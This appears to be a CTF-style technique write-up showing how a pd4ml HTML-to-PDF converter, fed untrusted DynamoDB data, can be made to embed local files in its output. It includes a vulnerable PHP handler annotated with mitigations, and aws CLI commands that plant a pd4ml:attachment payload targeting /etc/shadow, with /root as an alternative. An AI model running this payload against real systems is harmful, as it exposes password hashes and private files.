PD4ML Attachment from DynamoDB

privesc, foothold, web, aws

Overview #

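An attacker can gain access to sensitive files by having them embedded in a PDF document generated by the pd4ml library, via malicious DynamoDB data. The embedded file is read with the privileges of the process that runs the converter, so the impact depends on which account the web application runs as.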

Environment Setup #

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
// Request handler: on POST with action=get_alerts, read matching rows from the
// DynamoDB table "alerts", write each row's "data" attribute to an HTML file,
// and convert an HTML file to files/result.pdf with the pd4ml command-line tool.
//
// Security-relevant point: the "data" attribute is written out verbatim and then
// parsed by pd4ml as markup. Whoever can write to the "alerts" table therefore
// controls the converter's input, including pd4ml-specific tags such as the
// <pd4ml:attachment> tag shown in the Steps section of this page, which makes
// the converter embed a local file in the generated PDF.
// Mitigations to consider: restrict write access to the table, escape or strip
// markup from stored values before rendering, and run the converter under an
// unprivileged account with no read access to sensitive files.
// NOTE(review): the page's example targets /etc/shadow, which suggests this
// handler runs with elevated privileges; confirm which account serves it.
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                // Client uses the "default" credential profile and talks to a
                // local endpoint over plain HTTP (localhost:4566).
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                // Full-table Scan filtered to items whose title equals "Ransomware".
                // The filter value is a constant bound through
                // ExpressionAttributeValues; no request data reaches the query.
                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        // File name is a rand() value in 1..10000 plus ".html"; names can
                        // collide, in which case file_put_contents overwrites the earlier file.
                        $name=rand(1,10000).'.html';
                        // Untrusted table content is stored as HTML with no validation or escaping.
                        file_put_contents('files/'.$name,$item["data"]);
                }
                // Runs after the loop, so only the last item's file is converted; $name is
                // undefined when the scan returned no items. The command line is built by
                // string interpolation, but the only interpolated value is the locally
                // generated $name (digits plus ".html"), not request or table data.
                // The risk here is what pd4ml does with the file's contents, not the shell call.
                // NOTE(review): output lands in files/result.pdf; whether that directory is
                // served to clients is not visible in this listing, so confirm.
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
// Non-POST branch; its body is not included in this listing.
?>

Steps #

{
	"TableName": "alerts",
	"KeySchema": [{
			"AttributeName": "title",
			"KeyType": "HASH"
		},
		{
			"AttributeName": "data",
			"KeyType": "RANGE"
		}
	],
	"AttributeDefinitions": [{
			"AttributeName": "title",
			"AttributeType": "S"
		},
		{
			"AttributeName": "data",
			"AttributeType": "S"
		}
	],
	"ProvisionedThroughput": {
		"ReadCapacityUnits": 5,
		"WriteCapacityUnits": 5
	}
}
# The JSON document above is the alerts.json definition passed to create-table:
# a table named "alerts" with "title" as hash key and "data" as range key.
# NOTE(review): both aws calls succeed only if the DynamoDB endpoint at
# s3.bucket.htb accepts table creation and writes from this caller; restricting
# who can reach and write to that endpoint removes the precondition for the issue.
aws --endpoint-url http://s3.bucket.htb dynamodb create-table --cli-input-json file://./alerts.json
# Stores one item whose title matches the handler's filter ("Ransomware") and
# whose data attribute is a pd4ml:attachment tag pointing at a local file URL.
# Detection idea: flag stored values that contain "pd4ml:" tags or "file://" URLs.
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///etc/shadow</pd4ml:attachment>"}}
# Triggers the get_alerts handler; the application is addressed on localhost:8000,
# i.e. this request is made from the host itself.
curl -X POST 'http://localhost:8000' -d 'action=get_alerts'

Alternatives #

file:///root

References #